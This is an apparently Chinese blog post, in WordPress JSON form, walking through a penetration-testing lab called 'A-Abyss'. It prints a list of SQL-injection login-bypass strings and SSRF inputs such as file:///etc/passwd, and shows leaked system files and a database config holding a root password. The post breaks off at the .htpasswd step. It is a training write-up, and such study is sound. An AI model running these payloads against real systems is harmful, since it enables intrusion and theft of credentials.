{"id":699,"date":"2026-03-27T16:46:10","date_gmt":"2026-03-27T08:46:10","guid":{"rendered":"https:\/\/myblog.marsrains.top\/?p=699"},"modified":"2026-04-03T14:54:57","modified_gmt":"2026-04-03T06:54:57","slug":"%e7%bb%bc%e5%90%88%e6%b8%97%e9%80%8f%e8%ae%ad%e7%bb%83-a-abyss","status":"publish","type":"post","link":"https:\/\/myblog.marsrains.top\/?p=699","title":{"rendered":"\u7efc\u5408\u6e17\u900f\u8bad\u7ec3\u2014\u2014A-Abyss"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><strong>\u9776\u573a\u540d\u79f0<\/strong>\uff1a\u6f9c\u5b89\u79d1\u6280\u5185\u90e8\u8fd0\u7ef4\u7ba1\u7406\u5e73\u53f0 v2.1\uff08\u81ea\u5b9a\u4e49 PHP + Apache + MySQL \u9776\u573a\uff09<\/li>\n\n\n\n<li><strong>\u76ee\u6807\u7f51\u5740<\/strong>\uff1ahttp:\/\/172.16.11.213<\/li>\n\n\n\n<li><strong>\u6d89\u53ca\u64cd\u4f5c<\/strong>\uff1aSSRF + RCE + \u5bc6\u7801\u91cd\u7528 + sudo \u8def\u5f84\u7a7f\u8d8a<\/li>\n<\/ul>\n\n\n\n<p><strong>\u6838\u5fc3\u8003\u5bdf\u70b9<\/strong>\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SSRF\uff08file:\/\/ \u534f\u8bae\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff09<\/li>\n\n\n\n<li>PHP \u6e90\u7801\u5ba1\u8ba1\uff08\u767b\u5f55\u903b\u8f91\u3001admin_panel RCE\uff09<\/li>\n\n\n\n<li>\u5bc6\u7801\u91cd\u7528 + \u6570\u636e\u5e93\u6a2a\u5411\u79fb\u52a8<\/li>\n\n\n\n<li>sudoers \u4e25\u683c\u8def\u5f84\u9650\u5236\u7ed5\u8fc7\uff08less + \u76ee\u5f55\u7a7f\u8d8a\uff09<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n<p>\u5148\u901a\u8fc7curl\u6536\u96c6\u8be5\u7f51\u7ad9\u7684\u57fa\u672c\u4fe1\u606f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl -I http:\/\/172.16.11.213\/\n\n#\u8f93\u51fa\u7ed3\u679c\nHTTP\/1.1 200 OK\nDate: Fri, 27 Mar 2026 03:15:56 GMT\nServer: Apache\/2.4.62 (CentOS Stream)\nX-Powered-By: PHP\/8.0.30\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nSet-Cookie: PHPSESSID=phd9rd2e0h5irhu5p5po0ovdd6; path=\/\nContent-Type: text\/html; charset=UTF-8<\/code><\/pre>\n\n\n\n<p>\u63d0\u53d6\u7684\u57fa\u672c\u4fe1\u606f\u53ef\u4ee5\u6c47\u603b\u4e3a\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong><code>Server: Apache\/2.4.62 (CentOS Stream)<\/code><\/strong>:\n<ul class=\"wp-block-list\">\n<li><strong>\u4fe1\u606f\u6cc4\u9732<\/strong>: \u670d\u52a1\u5668\u660e\u786e\u66b4\u9732\u4e86 Web \u670d\u52a1\u5668\u8f6f\u4ef6\uff08Apache\uff09\u3001\u5177\u4f53\u7248\u672c\uff082.4.62\uff09\u548c\u64cd\u4f5c\u7cfb\u7edf\uff08CentOS Stream\uff09\u3002<\/li>\n\n\n\n<li><strong>\u98ce\u9669<\/strong>: \u53ef\u4ee5\u6839\u636e\u5177\u4f53\u7248\u672c\u67e5\u8be2\u5df2\u77e5\u7684 CVE \u6f0f\u6d1e\u8fdb\u884c\u653b\u51fb\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong><code>X-Powered-By: PHP\/8.0.30<\/code><\/strong>:\n<ul class=\"wp-block-list\">\n<li><strong>\u4e25\u91cd\u5b89\u5168\u9690\u60a3<\/strong>: \u8fd9\u91cc\u66b4\u9732\u4e86\u540e\u7aef\u8bed\u8a00\u4e3a PHP 8.0.30\u3002<\/li>\n\n\n\n<li><strong>\u751f\u547d\u5468\u671f\u95ee\u9898<\/strong>:&nbsp;<strong>PHP 8.0 \u5df2\u4e8e 2023 \u5e74 11 \u6708\u505c\u6b62\u5b98\u65b9\u652f\u6301\uff08EOL\uff09<\/strong>\u3002\u5728\u5f53\u524d\u65f6\u95f4\uff082026 \u5e74\uff09\uff0c\u8fd0\u884c\u4e00\u4e2a\u5df2\u7ecf\u505c\u6b62\u7ef4\u62a4\u8d85\u8fc7 2 \u5e74\u7684 PHP \u7248\u672c\u662f<strong>\u6781\u5ea6\u5371\u9669<\/strong>\u7684\u3002\u8fd9\u610f\u5473\u7740\u8be5\u7248\u672c\u4e0d\u518d\u63a5\u6536\u5b89\u5168\u8865\u4e01\uff0c\u5df2\u77e5\u6f0f\u6d1e\u5c06\u88ab\u6c38\u4e45\u5229\u7528\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u4e25\u91cd\u5b89\u5168\u9690\u60a3<\/strong>: \u8fd9\u91cc\u66b4\u9732\u4e86\u540e\u7aef\u8bed\u8a00\u4e3a PHP 8.0.30\u3002<\/li>\n\n\n\n<li><strong><code>Set-Cookie: PHPSESSID=phd9rd2e0h5irhu5p5po0ovdd6; path=\/<\/code><\/strong>\n<ul class=\"wp-block-list\">\n<li><strong>\u7f3a\u5931&nbsp;<code>Secure<\/code>&nbsp;\u6807\u5fd7<\/strong>: Cookie \u6ca1\u6709\u8bbe\u7f6e&nbsp;<code>Secure<\/code>&nbsp;\u5c5e\u6027\u3002\u5982\u679c\u7f51\u7ad9\u901a\u8fc7 HTTP\uff08\u975e\u52a0\u5bc6\uff09\u4f20\u8f93\uff0c\u8be5\u4f1a\u8bdd ID \u53ef\u80fd\u88ab\u7a83\u542c\u3002<strong>\u5728 2026 \u5e74\uff0c\u6240\u6709\u751f\u4ea7\u73af\u5883\u5e94\u5f3a\u5236\u4f7f\u7528 HTTPS \u5e76\u5f00\u542f Secure \u6807\u5fd7\u3002<\/strong><\/li>\n\n\n\n<li><strong>\u7f3a\u5931&nbsp;<code>HttpOnly<\/code>&nbsp;\u6807\u5fd7<\/strong>: \u6ca1\u6709\u8bbe\u7f6e&nbsp;<code>HttpOnly<\/code>\u3002\u8fd9\u610f\u5473\u7740 JavaScript \u53ef\u4ee5\u8bfb\u53d6\u8be5 Cookie\uff0c\u5982\u679c\u7f51\u7ad9\u5b58\u5728 XSS\uff08\u8de8\u7ad9\u811a\u672c\uff09\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u7a83\u53d6\u7528\u6237\u4f1a\u8bdd\u3002<\/li>\n\n\n\n<li><strong>\u7f3a\u5931&nbsp;<code>SameSite<\/code>&nbsp;\u6807\u5fd7<\/strong>: \u6ca1\u6709\u8bbe\u7f6e&nbsp;<code>SameSite<\/code>\uff08\u5982&nbsp;<code>Strict<\/code>&nbsp;\u6216&nbsp;<code>Lax<\/code>\uff09\u3002\u8fd9\u4f7f\u5f97\u7f51\u7ad9\u5bb9\u6613\u53d7\u5230 CSRF\uff08\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\uff09\u653b\u51fb\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e8c\u3001\u6f0f\u6d1e\u5229\u7528\u548c\u5206\u6790<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u5c1d\u8bd5\u7ed5\u8fc7<\/h3>\n\n\n\n<p>\u767b\u5f55IP\uff0c\u67e5\u770b\u7f51\u9875\u754c\u9762\u3002\u53d1\u73b0\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u5e38\u89c1\u7684sql\u6ce8\u5165\u7ed5\u8fc7\u767b\u5f55\u9a8c\u8bc1\u3002<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<ul class=\"wp-block-list\">\n<li>admin&#8221; or &#8220;1&#8221;=&#8221;1<\/li>\n\n\n\n<li>admin&#8221; or 1=1 &#8212;<\/li>\n\n\n\n<li>admin&#8221; or &#8220;1&#8221;=&#8221;1&#8243; &#8212;<\/li>\n\n\n\n<li>admin&#8217; or &#8216;1&#8217;=&#8217;1&#8242; &#8212;<\/li>\n\n\n\n<li>admin&#8217; or &#8216;1&#8217;=&#8217;1&#8242; #<\/li>\n\n\n\n<li>admin&#8217; or 1=1 &#8212; &#8211; \uff08\u591a\u4e00\u4e2a &#8211; \u6709\u65f6\u80fd\u7ed5\u8fc7\uff09<\/li>\n\n\n\n<li>&#8216; or &#8216;1&#8217;=&#8217;1&#8242; &#8212;<\/li>\n\n\n\n<li>admin&#8217; or &#8216;1&#8217;=&#8217;1&#8242; \/*<\/li>\n\n\n\n<li>&#8216;) or (&#8216;1&#8217;=&#8217;1<\/li>\n\n\n\n<li>1&#8242; or &#8216;1&#8217;=&#8217;1&#8242; &#8212;<\/li>\n\n\n\n<li>admin&#8217;\/**\/or\/**\/1=1&#8211;<\/li>\n\n\n\n<li>admin&#8217; or 1=1&#8211; \uff08\u53bb\u6389\u7a7a\u683c\u8bd5\u8bd5\uff09<\/li>\n\n\n\n<li>aDmIn&#8217; Or &#8216;1&#8217;=&#8217;1<\/li>\n\n\n\n<li>admin&#8217; or 2&gt;1 &#8212;<\/li>\n\n\n\n<li>admin&#8221; or 1=1 or &#8220;&#8221;=&#8221;<\/li>\n\n\n\n<li>admin&#8217;) or (&#8216;1&#8217;=&#8217;1&#8217;) &#8212;<\/li>\n\n\n\n<li>0&#8242; or 1=1 &#8212;<\/li>\n<\/ul>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"1012\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-703\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n<\/div>\n<\/div>\n\n\n\n<p>\u53ef\u4ee5\u521b\u5efa\u4e00\u4e2a\u57fa\u7840\u7684sql_inject.txt\u6587\u4ef6\uff0c\u901a\u8fc7sqlmap\u4f9d\u6b21\u6ce8\u5165\u3002\u6700\u7ec8\u53d1\u73b0\u65e0\u6cd5\u7ed5\u8fc7\uff0c\u8bf4\u660e\u524d\u7aef\u5185\u542b\u8fc7\u6ee4\u51fd\u6570\u3002<\/p>\n\n\n\n<p>\u53d1\u73b0\u6709\u4e2a\u6ce8\u518c\u7528\u6237\u7684\u9009\u9879\uff0c\u70b9\u51fb\u540e\u53ef\u4ee5\u521b\u5efa\u767b\u5f55\u7528\u6237\uff0c\u968f\u673a\u521b\u5efa\u4e00\u4e2a\u7b80\u5355\u7528\u6237\u8d26\u5bc6\u767b\u5f55\u5230\u540e\u53f0\uff0c\u67e5\u770b\u662f\u5426\u6709\u7a81\u7834\u53e3<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"1012\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-704\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n\n\n\n<p>\u6a21\u5757\u52a0\u8f7d\u5668\uff1a\u8df3\u8f6c\u540e\u51fa\u73b0\u5f39\u7a97\uff0c\u8f93\u5165\u521b\u5efa\u7684\u8d26\u5bc6\u65e0\u6cd5\u6b63\u5e38\u767b\u5f55\uff0c\u63a8\u6d4b\u9700\u8981\u7ba1\u7406\u5458\u6216\u8005\u540c\u7ea7\u7528\u6237\u7684\u8d26\u5bc6<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"418\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-707\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n\n\n\n<p>URL\u53ef\u7528\u6027\u68c0\u6d4b\uff1a\u8df3\u8f6c\u5230url_check.php\u3002\u53ef\u4ee5\u8f93\u5165\u9700\u8981\u68c0\u6d4b\u7684URL\uff0c\u8fd9\u91cc\u53ef\u80fd\u5c31\u6709\u7ecf\u5178\u7684RCE\u6f0f\u6d1e\u53ef\u4ee5\u5229\u7528\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-23.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"281\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-23.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-706\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">RCE\u6f0f\u6d1e\u5229\u7528\u548c\u5206\u6790<\/h3>\n\n\n\n<p>\u5148\u5c1d\u8bd5\u5982\u4e0b\u7684\u547d\u4ee4\u786e\u8ba4\u57fa\u672c\u884c\u4e3a\uff0c\u540c\u65f6\u5206\u6790\u5185\u90e8\u5b58\u5728\u7684\u6f0f\u6d1e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>http:\/\/172.16.11.213\/ <\/li>\n\n\n\n<li>https:\/\/www.baidu.com<\/li>\n\n\n\n<li>http:\/\/127.0.0.1\/ <\/li>\n\n\n\n<li>http:\/\/localhost\/ <\/li>\n\n\n\n<li>http:\/\/[::1]\/<\/li>\n\n\n\n<li>file:\/\/\/etc\/passwd<\/li>\n\n\n\n<li>dict:\/\/127.0.0.1:6379\/info<\/li>\n<\/ul>\n\n\n\n<p>\u5f53\u8f93\u5165<code>file:\/\/\/etc\/passwd<\/code>\u65f6\uff0c\u51fa\u73b0\u4ee5\u4e0b\u7ed3\u679c\uff0c\u53ef\u786e\u5b9a\u542b\u6709SSRF\u6f0f\u6d1e\uff0c\u540c\u65f6\u652f\u6301<code>file:\/\/<\/code>\u534f\u8bae<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_103855_472.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"929\" height=\"1012\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_103855_472.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-708\"  sizes=\"auto, (max-width: 929px) 100vw, 929px\" \/><\/div><\/figure>\n\n\n\n<p>\u5c1d\u8bd5\u66f4\u591a<code>file:\/\/<\/code>\u534f\u8bae\uff0c\u6700\u7ec8\u7206\u51fa\u7684\u7ed3\u679c\u5f88\u591a\uff0c\u65e0\u7528\u4fe1\u606f\u4e5f\u4e0d\u5c11\uff0c\u8fc7\u6ee4\u540e\u5173\u952e\u4fe1\u606f\u540e\uff0c\u5176\u4e2d\u5df2\u51fa\u73b0\uff1a<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<pre class=\"wp-block-code\"><code>file:\/\/\/etc\/group\n\u68c0\u6d4b\u7ed3\u679c\n\u72b6\u6001\u7801: 0\n\nroot:x:0:\nbin:x:1:\ndaemon:x:2:\nsys:x:3:\nadm:x:4:\ntty:x:5:\ndisk:x:6:\nlp:x:7:\nmem:x:8:\nkmem:x:9:\nwheel:x:10:\ncdrom:x:11:\nmail:x:12:\nman:x:15:\n...\n...\nsshd:x:74:\ntcpdump:x:72:\napache:x:48:\nnginx:x:994:\nmysql:x:27:\nliwei:x:1000:<\/code><\/pre>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<pre class=\"wp-block-code\"><code>file:\/\/\/\/var\/www\/html\/db.php\n&lt;?php\n$host = '127.0.0.1';\n$db   = 'abyss_platform';\n$user = 'root';\n$pass = 'R#xK9mWz$2pLnQ7v';\n$charset = 'utf8mb4';\n\n$dsn = \"mysql:host=$host;dbname=$db;charset=$charset\";\n$options = &#91;\n    PDO::ATTR_ERRMODE            =&gt; PDO::ERRMODE_EXCEPTION,\n    PDO::ATTR_DEFAULT_FETCH_MODE =&gt; PDO::FETCH_ASSOC,\n];\n\ntry {\n    $pdo = new PDO($dsn, $user, $pass, $options);\n} catch (\\PDOException $e) {\n    die(\"\u6570\u636e\u5e93\u8fde\u63a5\u5931\u8d25\");\n}\n?&gt;<\/code><\/pre>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<pre class=\"wp-block-code\"><code>file:\/\/\/var\/www\/html\/api\/.htaccess\nAuthType Basic\nAuthName \"Restricted API\"\nAuthUserFile \/var\/www\/html\/api\/.htpasswd\nRequire valid-user\n# admin_panel \u4e0d\u9700\u8981\u8ba4\u8bc1\uff08\u65e0\u6269\u5c55\u540d\uff0c\u76f4\u63a5\u8fd4\u56de\u6e90\u7801\uff09\n&lt;Files \"admin_panel\"&gt;\n&nbsp;&nbsp;&nbsp;&nbsp;Require all granted\n&lt;\/Files&gt;\n# url_check.php \u4e0d\u9700\u8981Basic Auth\uff08\u4f9d\u8d56PHP session\u68c0\u67e5\uff09\n&lt;Files \"url_check.php\"&gt;\n&nbsp;&nbsp;&nbsp;&nbsp;Require all granted\n&lt;\/Files&gt;<\/code><\/pre>\n<\/div>\n<\/div>\n\n\n\n<p>\u91cd\u70b9\u5206\u6790<code>file:\/\/\/var\/www\/html\/api\/.htaccess<\/code><\/p>\n\n\n\n<div class=\"wp-block-argon-collapse collapse-block shadow-sm collapsed hide-border-left\" style=\"border-left-color:#ffffff00\"><div class=\"collapse-block-title\" style=\"background-color:#ffffff00\"><span class=\"collapse-block-title-inner\">\u5173\u4e8e.htaccess\uff1a<\/span><i class=\"collapse-icon fa fa-angle-down\"><\/i><\/div><div class=\"collapse-block-body\" style=\"display: none\"><code>.htaccess<\/code>\u00a0\u662f Apache Web \u670d\u52a1\u5668\u4e2d\u4e00\u4e2a\u975e\u5e38\u5f3a\u5927\u4e14\u5e38\u7528\u7684<strong>\u5206\u5e03\u5f0f\u914d\u7f6e\u6587\u4ef6<\/strong>\u3002<code>.htaccess<\/code>\u00a0\u662f\u7528\u6765\u4f18\u5316\u3001\u4fee\u590d\u6216\u914d\u7f6eHTTP\u54cd\u5e94\u8bb8\u591a\u9879\uff08\u5982\u7f13\u5b58\u7b56\u7565\u3001\u5b89\u5168\u5934\u3001\u91cd\u5b9a\u5411\u7b49\uff09\u7684\u5173\u952e\u5de5\u5177<br><strong>\u5168\u79f0<\/strong>\uff1aHypertext Access\u3002<br><strong>\u4f5c\u7528<\/strong>\uff1a\u5b83\u662f Apache \u670d\u52a1\u5668\u7684\u76ee\u5f55\u7ea7\u914d\u7f6e\u6587\u4ef6\u3002\u653e\u7f6e\u5728\u7f51\u7ad9\u67d0\u4e2a\u76ee\u5f55\u4e0b\u7684\u00a0<code>.htaccess<\/code>\u00a0\u6587\u4ef6\uff0c\u4f1a\u5bf9\u8be5\u76ee\u5f55\u53ca\u5176\u6240\u6709\u5b50\u76ee\u5f55\u751f\u6548\u3002<br><strong>\u7279\u70b9<\/strong>\uff1a<strong>\u65e0\u9700\u91cd\u542f\u670d\u52a1\u5668<\/strong>\uff1a\u4fee\u6539\u540e\u7acb\u5373\u751f\u6548\uff08\u65e0\u9700\u91cd\u542f Apache \u670d\u52a1\uff09\u3002<br><strong>\u6743\u9650\u5206\u6563<\/strong>\uff1a\u9002\u5408\u865a\u62df\u4e3b\u673a\u6216\u5171\u4eab\u4e3b\u673a\u73af\u5883\uff0c\u7528\u6237\u65e0\u9700\u7ba1\u7406\u5458\u6743\u9650\u5373\u53ef\u914d\u7f6e\u81ea\u5df1\u7684\u7f51\u7ad9\u884c\u4e3a\u3002<br><strong>\u6027\u80fd\u5f00\u9500<\/strong>\uff1aApache \u4f1a\u5728\u6bcf\u6b21\u8bf7\u6c42\u65f6\u9010\u7ea7\u67e5\u627e\u5e76\u8bfb\u53d6\u00a0<code>.htaccess<\/code>\u00a0\u6587\u4ef6\uff0c\u56e0\u6b64\u8fc7\u591a\u6216\u590d\u6742\u7684\u89c4\u5219\u4f1a\u5f71\u54cd\u6027\u80fd\u3002<\/div><\/div>\n\n\n\n<p><br>\u4ece\u5185\u90e8\u5305\u542b\u7684\u6587\u4ef6\u53ef\u4ee5\u770b\u51fa\uff0c\u8be5\u7f51\u7ad9\u5b58\u5728\u4e00\u4e2a\u7279\u6b8a\u6587\u4ef6:<code><mark style=\"background-color:#f78da7\" class=\"has-inline-color\">admin_panel<\/mark><\/code>\uff0c\u88ab\u8bbe\u7f6e\u4e3a\u4e0d\u9700\u8981\u4efb\u4f55\u8ba4\u8bc1\u5c31\u53ef\u4ee5\u76f4\u63a5\u8fd4\u56de\u6e90\u7801\uff0c\u63a8\u6d4b\u53ef\u80fd\u4e3a\u4e00\u4e2a\u540e\u95e8\u7a0b\u5e8f\u6216\u6587\u4ef6\u3002\u5c1d\u8bd5\u767b\u5f55\u8be5\u7f51\u9875\uff0c\u53d1\u73b0\u662f\u4e00\u4e2a\u7c7b\u4f3cexec\u7684\u64cd\u4f5c\u53f0,\u4f46\u662f\u9700\u8981\u76f8\u5173\u7684\u8fd0\u7ef4\u4ee4\u724c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-26.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"1012\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-26.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-713\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n\n\n\n<p>\u968f\u673a\u6d4b\u8bd5\u8f93\u5165\u4ee4\u724c\uff0c\u53d1\u73b0\u88ab\u9650\u5236\u5230\u53ea\u67093\u4e2a\u5b57\u7b26\uff0c\u5373\u4f7f\u901a\u8fc7\u4fee\u6539\u63a7\u5236\u53f0\u4e2d\u7684HTML\u4e5f\u4e0d\u8d77\u6548\u679c\uff0c\u63a8\u6d4b\u662f\u5426\u4e3a\u89e3\u5bc6\u540e\u7684\u5b57\u7b26\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-27.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"801\" height=\"891\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/image-27.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-714\"  sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/div><\/figure>\n\n\n\n<p>\u56de\u5230URL\u6027\u80fd\u68c0\u6d4b\u5668\u3002\u65e2\u7136<code>.htaccess<\/code>\u80fd\u88ab\u8fd4\u56de\u51fa\u7ed3\u679c\uff0c\u5c1d\u8bd5<code>file:\/\/\/var\/www\/html\/api\/.htpasswd<\/code>\uff1a<\/p>\n\n\n\n<div class=\"wp-block-argon-collapse collapse-block shadow-sm collapsed hide-border-left\" style=\"border-left-color:#ffffff00\"><div class=\"collapse-block-title\" style=\"background-color:#ffffff00\"><span class=\"collapse-block-title-inner\">\u5173\u4e8e.htpasswd<\/span><i class=\"collapse-icon fa fa-angle-down\"><\/i><\/div><div 